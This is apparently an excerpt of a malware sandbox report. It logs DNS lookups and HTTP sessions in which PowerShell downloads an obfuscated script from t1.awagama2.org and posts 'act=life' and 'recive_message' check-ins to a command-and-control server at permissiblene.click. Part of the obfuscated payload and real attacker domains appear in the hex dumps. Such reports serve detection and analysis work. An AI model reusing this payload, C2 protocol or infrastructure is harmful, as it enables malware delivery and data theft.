                                                                                                      Dec 31, 2024 09:26:38.342010975 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.342030048 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.342076063 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.342082977 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.342111111 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.342541933 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.342561960 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.342592001 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.342597961 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.342608929 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.343616009 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.343631983 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.343667030 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.343672991 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.343691111 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.385533094 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.385557890 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.385679960 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.385703087 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.386945963 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.386960983 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.387001038 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.387008905 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.387036085 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.387111902 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.387165070 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.387168884 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.387206078 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.387208939 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.387249947 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.404370070 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.404393911 CET44349993104.21.37.128192.168.2.5
                                                                                                      Dec 31, 2024 09:26:38.404402971 CET49993443192.168.2.5104.21.37.128
                                                                                                      Dec 31, 2024 09:26:38.404407978 CET44349993104.21.37.128192.168.2.5
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 31, 2024 09:25:04.799381971 CET4970553192.168.2.51.1.1.1
                                                                                                      Dec 31, 2024 09:25:04.824223042 CET53497051.1.1.1192.168.2.5
                                                                                                      Dec 31, 2024 09:26:21.150122881 CET5208353192.168.2.51.1.1.1
                                                                                                      Dec 31, 2024 09:26:21.162926912 CET53520831.1.1.1192.168.2.5
                                                                                                      Dec 31, 2024 09:26:31.516633034 CET6447853192.168.2.51.1.1.1
                                                                                                      Dec 31, 2024 09:26:31.528918982 CET53644781.1.1.1192.168.2.5
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 31, 2024 09:25:04.799381971 CET192.168.2.51.1.1.10x17c3Standard query (0)t1.awagama2.orgA (IP address)IN (0x0001)false
                                                                                                      Dec 31, 2024 09:26:21.150122881 CET192.168.2.51.1.1.10xc5ecStandard query (0)permissiblene.clickA (IP address)IN (0x0001)false
                                                                                                      Dec 31, 2024 09:26:31.516633034 CET192.168.2.51.1.1.10xb0eStandard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 31, 2024 09:25:04.824223042 CET1.1.1.1192.168.2.50x17c3No error (0)t1.awagama2.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      Dec 31, 2024 09:25:04.824223042 CET1.1.1.1192.168.2.50x17c3No error (0)t1.awagama2.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                      Dec 31, 2024 09:26:21.162926912 CET1.1.1.1192.168.2.50xc5ecNo error (0)permissiblene.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                      Dec 31, 2024 09:26:21.162926912 CET1.1.1.1192.168.2.50xc5ecNo error (0)permissiblene.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      Dec 31, 2024 09:26:31.528918982 CET1.1.1.1192.168.2.50xb0eNo error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                      Dec 31, 2024 09:26:31.528918982 CET1.1.1.1192.168.2.50xb0eNo error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                      • t1.awagama2.org
                                                                                                      • permissiblene.click
                                                                                                      • klipvumisui.shop
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.549707188.114.97.3443616C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:25:05 UTC75OUTGET /Scheele.pt HTTP/1.1
                                                                                                      Host: t1.awagama2.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-31 08:25:05 UTC628INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:25:05 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 8296609
                                                                                                      Connection: close
                                                                                                      X-Powered-By: Express
                                                                                                      ETag: W/"7e98a1-6OIGu83Oms11y2C+NXEBVfSIkFA"
                                                                                                      Set-Cookie: connect.sid=s%3A9aHIBsf0qWJeiruCUr6c3I9NKkjU7QG7.tUGOoemzs1D9%2FIg1FnCGbHnKDUTwSQzj0us8xhrBUr8; Path=/; HttpOnly
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e0814b81438a-EWR
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=27633&min_rtt=27359&rtt_var=10456&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=689&delivery_rate=106729&cwnd=210&unsent_bytes=0&cid=2ca42ba75e76cf33&ts=438&x=0"
                                                                                                      2024-12-31 08:25:05 UTC741INData Raw: 0d 0a 24 79 64 4f 74 77 6b 46 68 20 3d 20 28 28 28 28 28 39 32 38 39 34 31 20 2a 20 2d 31 31 29 20 2b 20 28 28 28 28 31 31 32 38 35 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2b 20 37 31 36 33 36 36 29 20 2b 20 34 35 34 29 29 29 20 2a 20 2d 34 38 37 29 20 2d 20 32 37 33 31 29 20 2b 20 2d 38 38 29 0d 0a 24 52 72 48 56 77 4e 57 46 6b 70 52 20 3d 20 28 28 28 28 28 28 36 38 39 39 38 20 2a 20 28 28 28 28 28 28 34 31 30 37 30 39 20 2a 20 33 36 37 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 35 39 29 29 29 20 2a 20 28 28 28 28 2d 39 20 2a 20 2d 31 29 20 2d 20 32 36 34 34 35 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2d 20 24 52 72 48 56 77 4e 57 46 6b 70
                                                                                                      Data Ascii: $ydOtwkFh = (((((928941 * -11) + ((((11285 * $ydOtwkFh) + 716366) + 454))) * -487) - 2731) + -88)$RrHVwNWFkpR = ((((((68998 * ((((((410709 * 367) + $RrHVwNWFkpR) * $ydOtwkFh) - $ydOtwkFh) - 59))) * ((((-9 * -1) - 26445) + $RrHVwNWFkpR))) - $RrHVwNWFkp
                                                                                                      2024-12-31 08:25:05 UTC1369INData Raw: 31 30 39 20 2d 20 24 4d 6c 6a 77 4a 72 79 70 29 20 2d 20 2d 38 38 34 31 37 29 29 29 20 2d 20 34 37 31 29 20 2d 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2b 20 2d 36 29 29 20 2a 20 28 28 28 28 28 32 38 38 20 2a 20 2d 34 29 20 2b 20 38 29 20 2a 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2b 20 2d 33 30 31 36 37 33 29 20 2d 20 2d 33 38 38 37 38 29 29 0d 0a 24 41 6e 50 74 6e 43 4a 56 41 50 4a 20 3d 20 28 28 28 28 28 2d 31 20 2b 20 36 39 39 34 33 37 29 20 2d 20 33 30 30 32 35 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 29 20 2b 20 28 28 28 28 28 24 41 6e 50 74 6e 43 4a 56 41 50 4a 20 2b 20 37 29 20 2d 20 2d 33 37 38 29 20 2b 20 39 33 37 37 35 39 29 20 2b 20 2d 31 38 32 29 20 2b 20 31 31 36 37 32 29 29 0d 0a 24 7a 64 74 6d 50 43 49 64 6a 65 20 3d 20 28 28 28 28 28
                                                                                                      Data Ascii: 109 - $MljwJryp) - -88417))) - 471) - $lKvHsvSFKh) + -6)) * (((((288 * -4) + 8) * $lKvHsvSFKh) + -301673) - -38878))$AnPtnCJVAPJ = (((((-1 + 699437) - 30025) - $ydOtwkFh)) + ((((($AnPtnCJVAPJ + 7) - -378) + 937759) + -182) + 11672))$zdtmPCIdje = (((((
                                                                                                      2024-12-31 08:25:05 UTC1369INData Raw: 6a 65 29 20 2d 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 29 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2d 20 24 41 75 51 44 42 68 47 5a 4b 29 20 2a 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 0d 0a 24 5a 63 69 55 6a 75 55 62 59 20 3d 20 28 28 28 28 24 5a 6f 4d 77 7a 6f 20 2b 20 24 5a 63 69 55 6a 75 55 62 59 29 20 2a 20 2d 39 30 39 35 29 20 2a 20 28 28 28 28 28 37 39 38 20 2a 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 20 2d 20 24 71 6f 46 70 4c 68 6e 66 29 20 2b 20 2d 35 35 39 29 20 2a 20 2d 34 29 29 29 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 62 48 43 78 7a 43 5a 20 3d 20 28 28 28 28 24 79 64 4f 74 77 6b 46 68 20 2d 20 36 39 34 31 32 36 29 20 2a 20 2d 31 39 32 39 34 29 29 20 2a 20 28 28 28 28 28 24 79 51 55 49 4d 48 68 57 20 2b 20 2d 39 36
                                                                                                      Data Ascii: je) - $AnPtnCJVAPJ))) * $RrHVwNWFkpR) - $AuQDBhGZK) * $fkuVbXZoeVZ)$ZciUjuUbY = (((($ZoMwzo + $ZciUjuUbY) * -9095) * (((((798 * $zfqrqsHsIfm) - $qoFpLhnf) + -559) * -4))) + $ydOtwkFh)$bHCxzCZ = (((($ydOtwkFh - 694126) * -19294)) * ((((($yQUIMHhW + -96
                                                                                                      2024-12-31 08:25:05 UTC1369INData Raw: 74 79 63 4a 42 51 4f 45 20 2a 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2a 20 2d 39 29 20 2a 20 24 4d 6c 6a 77 4a 72 79 70 29 29 20 2a 20 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2a 20 28 28 28 28 28 28 24 62 48 43 78 7a 43 5a 20 2a 20 39 30 29 20 2d 20 2d 31 29 20 2b 20 34 33 34 34 38 29 20 2a 20 24 5a 63 69 55 6a 75 55 62 59 29 20 2a 20 24 77 74 79 63 4a 42 51 4f 45 29 29 29 20 2a 20 24 4a 4f 44 52 52 75 29 20 2a 20 28 28 28 28 28 24 6e 4e 73 4c 73 4c 62 53 47 20 2a 20 37 32 36 29 20 2d 20 2d 39 37 36 30 29 20 2d 20 30 29 20 2d 20 2d 32 33 36 32 29 29 29 29 29 0d 0a 69 66 20 28 28 24 62 48 43 78 7a 43 5a 20 2d 6c 74 20 24 58 72 76 4b 6c 6a 29 20 2d 6f 72 20 28 37 39 20 2d 67 65 20 24 58 72 76 4b 6c 6a 29 20 2d 6f 72 20 28 24 41 75 51 44 42 68 47 5a
                                                                                                      Data Ascii: tycJBQOE * $zdtmPCIdje) * -9) * $MljwJryp)) * ((($zdtmPCIdje * (((((($bHCxzCZ * 90) - -1) + 43448) * $ZciUjuUbY) * $wtycJBQOE))) * $JODRRu) * ((((($nNsLsLbSG * 726) - -9760) - 0) - -2362)))))if (($bHCxzCZ -lt $XrvKlj) -or (79 -ge $XrvKlj) -or ($AuQDBhGZ
                                                                                                      2024-12-31 08:25:05 UTC1369INData Raw: 28 24 44 4c 65 70 6f 6f 6b 6f 79 57 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2d 6e 65 20 33 39 34 29 20 2d 61 6e 64 20 28 24 77 74 79 63 4a 42 51 4f 45 20 2d 65 71 20 2d 35 29 20 2d 61 6e 64 20 28 24 71 6f 46 70 4c 68 6e 66 20 2d 6e 65 20 24 4a 4f 44 52 52 75 29 20 2d 61 6e 64 20 28 34 37 20 2d 6e 65 20 31 34 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 67 67 4a 64 54 56 74 6e 70 43 20 3d 20 28 28 28 24 67 48 66 64 72 4f 46 20 2d 20 36 37 38 33 29 20 2a 20 2d 39 33 31 37 29 20 2d 20 36 31 38 36 32 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 69 66 20 28 28 31 39 32 32 20 2d 65 71 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 20 2d 6f 72 20 28 24 6a 5a 79 4a 78 78 41 6c 59 20 2d 65 71 20 33 31 37 33 34 37 29
                                                                                                      Data Ascii: ($DLepookoyW -gt 0) { if (($zdtmPCIdje -ne 394) -and ($wtycJBQOE -eq -5) -and ($qoFpLhnf -ne $JODRRu) -and (47 -ne 14)) { $ggJdTVtnpC = ((($gHfdrOF - 6783) * -9317) - 61862) } if ((1922 -eq $AnPtnCJVAPJ) -or ($jZyJxxAlY -eq 317347)
                                                                                                      2024-12-31 08:25:05 UTC1369INData Raw: 51 4f 45 29 20 2a 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 20 2b 20 24 4a 4f 44 52 52 75 29 20 2d 20 24 4b 76 48 6f 6a 56 52 4b 6f 29 20 2a 20 31 31 37 38 29 29 29 20 2a 20 24 67 67 4a 64 54 56 74 6e 70 43 29 0d 0a 20 20 20 20 69 66 20 28 28 2d 34 38 36 20 2d 65 71 20 24 67 48 66 64 72 4f 46 29 20 2d 6f 72 20 28 37 34 30 31 36 20 2d 67 65 20 2d 35 36 37 33 34 30 29 20 2d 6f 72 20 28 2d 37 38 37 37 20 2d 67 74 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 20 3d 20 28 28 28 38 38 35 20 2d 20 2d 31 37 30 31 35 39 29 20 2d 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 24 5a 63 69 55 6a 75 55 62 59 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 24 74 78 64 7a 42 50 2d 2d 0d 0a 7d 0d 0a 24 62
                                                                                                      Data Ascii: QOE) * $AnPtnCJVAPJ) + $JODRRu) - $KvHojVRKo) * 1178))) * $ggJdTVtnpC) if ((-486 -eq $gHfdrOF) -or (74016 -ge -567340) -or (-7877 -gt $lKvHsvSFKh)) { $soeKiYDkqeY = (((885 - -170159) - $RrHVwNWFkpR) * $ZciUjuUbY) } $txdzBP--}$b
                                                                                                      2024-12-31 08:25:05 UTC1369INData Raw: 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 39 38 33 20 2d 20 28 28 28 24 41 6e 50 74 6e 43 4a 56 41 50 4a 20 2b 20 24 41 75 51 44 42 68 47 5a 4b 29 20 2d 20 2d 32 32 38 32 31 29 29 29 20 2d 20 2d 37 30 38 38 33 29 0d 0a 7d 0d 0a 24 6e 66 43 47 72 43 51 49 45 6e 76 20 3d 20 28 28 28 24 67 48 66 64 72 4f 46 20 2d 20 28 28 28 28 2d 36 38 39 37 30 20 2d 20 28 28 28 28 28 28 28 2d 35 34 39 30 34 38 20 2a 20 28 28 28 28 28 28 34 30 20 2a 20 24 6a 5a 79 4a 78 78 41 6c 59 29 20 2a 20 24 79 51 55 49 4d 48 68 57 29 20 2b 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 20 2a 20 2d 34 29 20 2b 20 24 6a 5a 79 4a 78 78 41 6c 59 29 29 29 20 2d 20 2d 38 32 30 32 30 32 29 20 2d 20 28 28 28 24 4c 46 7a 68 4e 6f 62 6a 5a 20 2b 20 24 5a 6f 4d 77 7a 6f 29 20 2a 20
                                                                                                      Data Ascii: $yQUIMHhW = ((983 - ((($AnPtnCJVAPJ + $AuQDBhGZK) - -22821))) - -70883)}$nfCGrCQIEnv = ((($gHfdrOF - ((((-68970 - (((((((-549048 * ((((((40 * $jZyJxxAlY) * $yQUIMHhW) + $zfqrqsHsIfm) * -4) + $jZyJxxAlY))) - -820202) - ((($LFzhNobjZ + $ZoMwzo) *
                                                                                                      2024-12-31 08:25:05 UTC1369INData Raw: 46 4b 68 20 2d 20 24 76 76 6b 45 44 50 61 62 29 20 2b 20 33 35 31 29 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 24 51 4e 54 5a 43 42 2d 2d 0d 0a 7d 0d 0a 24 73 6f 65 4b 69 59 44 6b 71 65 59 20 3d 20 28 28 24 67 67 4a 64 54 56 74 6e 70 43 20 2d 20 28 28 28 28 24 56 41 58 70 51 68 20 2a 20 24 56 41 58 70 51 68 29 20 2a 20 38 33 33 29 20 2d 20 24 79 51 55 49 4d 48 68 57 29 29 29 20 2d 20 2d 38 29 0d 0a 69 66 20 28 28 24 5a 6f 4d 77 7a 6f 20 2d 65 71 20 2d 32 32 33 29 20 2d 6f 72 20 28 2d 33 37 20 2d 67 65 20 33 37 38 29 29 20 7b 0d 0a 20 20 20 20 24 62 48 43 78 7a 43 5a 20 3d 20 28 28 28 28 28 24 5a 6f 4d 77 7a 6f 20 2d 20 28 28 28 28 2d 36 20 2a 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2b 20 2d 36 31 39 30 37 29 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 29
                                                                                                      Data Ascii: FKh - $vvkEDPab) + 351)) } $QNTZCB--}$soeKiYDkqeY = (($ggJdTVtnpC - (((($VAXpQh * $VAXpQh) * 833) - $yQUIMHhW))) - -8)if (($ZoMwzo -eq -223) -or (-37 -ge 378)) { $bHCxzCZ = ((((($ZoMwzo - ((((-6 * $fkuVbXZoeVZ) + -61907) + $ydOtwkFh))
                                                                                                      2024-12-31 08:25:05 UTC1369INData Raw: 62 48 43 78 7a 43 5a 29 20 2b 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 0d 0a 7d 0d 0a 24 79 49 70 65 6d 75 4f 63 66 20 3d 20 28 28 28 28 28 2d 36 39 20 2d 20 28 28 28 28 2d 39 36 38 38 20 2d 20 24 4d 6c 6a 77 4a 72 79 70 29 20 2d 20 2d 32 39 32 29 20 2d 20 24 79 51 55 49 4d 48 68 57 29 29 29 20 2b 20 28 28 28 28 31 20 2a 20 28 28 28 28 28 28 39 35 20 2a 20 24 6e 66 43 47 72 43 51 49 45 6e 76 29 20 2a 20 28 28 28 24 4c 46 7a 68 4e 6f 62 6a 5a 20 2b 20 24 4d 6c 6a 77 4a 72 79 70 29 20 2b 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 29 29 20 2a 20 35 29 29 20 2b 20 28 28 28 2d 38 36 37 20 2b 20 38 39 39 31 34 29 20 2a 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2b 20 24 5a 6f 4d 77 7a 6f 29 29 29 29 20 2a 20 36 30 29 20 2d 20 28 28 28 28 28 28 28 28 35 38 35
                                                                                                      Data Ascii: bHCxzCZ) + $AnPtnCJVAPJ)}$yIpemuOcf = (((((-69 - ((((-9688 - $MljwJryp) - -292) - $yQUIMHhW))) + ((((1 * ((((((95 * $nfCGrCQIEnv) * ((($LFzhNobjZ + $MljwJryp) + $AnPtnCJVAPJ))) * 5)) + (((-867 + 89914) * $fkuVbXZoeVZ) + $ZoMwzo)))) * 60) - ((((((((585
                                                                                                      2024-12-31 08:25:05 UTC823INData Raw: 29 0d 0a 20 20 20 20 24 53 63 6a 77 5a 57 47 2d 2d 0d 0a 7d 0d 0a 24 71 6f 46 70 4c 68 6e 66 20 3d 20 28 28 28 28 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2d 20 28 28 28 28 28 24 4d 6c 6a 77 4a 72 79 70 20 2d 20 28 28 28 28 28 28 28 24 4c 46 7a 68 4e 6f 62 6a 5a 20 2d 20 28 28 28 28 28 2d 38 20 2a 20 36 32 31 36 29 20 2b 20 35 29 20 2b 20 34 30 39 32 33 34 29 20 2d 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 29 29 20 2d 20 24 58 72 76 4b 6c 6a 29 20 2a 20 28 28 28 28 24 77 74 79 63 4a 42 51 4f 45 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 24 79 49 70 65 6d 75 4f 63 66 29 20 2b 20 24 6e 4e 73 4c 73 4c 62 53 47 29 29 29 20 2b 20 33 33 36 29 29 20 2b 20 28 28 28 28 28 24 58 72 76 4b 6c 6a 20 2b 20 24 5a 6f 4d 77 7a 6f 29 20 2d 20 24 6a 5a 79 4a
                                                                                                      Data Ascii: ) $ScjwZWG--}$qoFpLhnf = ((((((($lKvHsvSFKh - ((((($MljwJryp - ((((((($LFzhNobjZ - (((((-8 * 6216) + 5) + 409234) - $zfqrqsHsIfm))) - $XrvKlj) * (((($wtycJBQOE + $lKvHsvSFKh) * $yIpemuOcf) + $nNsLsLbSG))) + 336)) + ((((($XrvKlj + $ZoMwzo) - $jZyJ


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.549983188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:21 UTC266OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8
                                                                                                      Host: permissiblene.click
                                                                                                      2024-12-31 08:26:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                      Data Ascii: act=life
                                                                                                      2024-12-31 08:26:22 UTC1130INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:22 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=5opls1e6fvrg9mebjgknebqh37; expires=Sat, 26 Apr 2025 02:13:00 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O37hZbsgqmq2wpyJuoSn72wZw%2B%2FSkrOB5YqXxfc8tssaiDEfF%2Fp8rClAjzGeM4kS2ym%2BLygTQSwu4ICNUd4BX6GfEYNgo4q8eVaEFwQmT%2FGImsn1kUnP%2B70aGPVIAS2DBH7Xqtca"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e25ddf0443c4-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2306&min_rtt=2305&rtt_var=867&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1260794&cwnd=32&unsent_bytes=0&cid=ae2f18fd76007e9f&ts=479&x=0"
                                                                                                      2024-12-31 08:26:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                      Data Ascii: 2ok
                                                                                                      2024-12-31 08:26:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.549984188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:22 UTC267OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 77
                                                                                                      Host: permissiblene.click
                                                                                                      2024-12-31 08:26:22 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 61 4e 4c 6a 2d 2d 72 65 35 26 6a 3d 34 61 62 63 65 31 34 36 39 61 30 38 36 37 65 33 61 31 39 61 62 63 65 37 31 34 36 34 63 34 37 33
                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=yJaNLj--re5&j=4abce1469a0867e3a19abce71464c473
                                                                                                      2024-12-31 08:26:22 UTC1131INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:22 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=nprq68stsajmeo0bfk9ds1ibko; expires=Sat, 26 Apr 2025 02:13:01 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKvK8%2F1TA8Gk16B24HFMjwkIJ%2BFDCHMwBoQ%2FH%2FG3SHSG1WfSDRnVZdL1JoYOmWZZYX7sFSzPsbgZytWUjNAZj34dBE12F%2B8JbH95k8MAELbuFKmvrP5WVUz%2BnHkfEQ089dqbSVaR"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e263a96442bf-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=1813&rtt_var=840&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=980&delivery_rate=1610590&cwnd=213&unsent_bytes=0&cid=fe2755522d961ad4&ts=426&x=0"
                                                                                                      2024-12-31 08:26:22 UTC238INData Raw: 33 39 63 34 0d 0a 63 6a 39 32 50 65 61 39 61 78 50 6f 4c 34 68 32 42 69 47 65 37 51 73 57 4d 53 65 38 6a 51 74 73 48 39 38 4a 41 62 67 50 68 54 77 4a 48 51 41 66 33 49 6c 48 4d 5a 74 4b 71 6b 78 67 51 50 4b 65 62 6a 6f 54 52 74 69 76 4d 51 70 2b 73 33 70 6b 6c 43 33 7a 55 56 41 46 45 46 79 4b 7a 67 34 2f 79 6b 72 77 56 44 78 36 35 63 39 75 65 42 4d 64 6e 75 68 68 44 6e 36 7a 61 32 44 54 59 50 56 51 45 56 63 61 57 6f 37 59 43 48 65 4a 51 2b 55 54 59 30 54 2f 68 32 56 2f 58 45 2f 52 72 79 64 4f 65 71 55 72 4f 35 70 43 34 45 67 54 63 68 64 4f 6a 5a 38 57 50 35 4d 4e 37 52 67 6b 47 37 79 4d 62 6e 52 64 51 64 6a 6d 59 77 52 33 75 32 70 6c 30 6e 2f 73 57 68 70 58 46 46 6d 50 30 67 46 6a 68 45 6e 69 47 47 56 4f
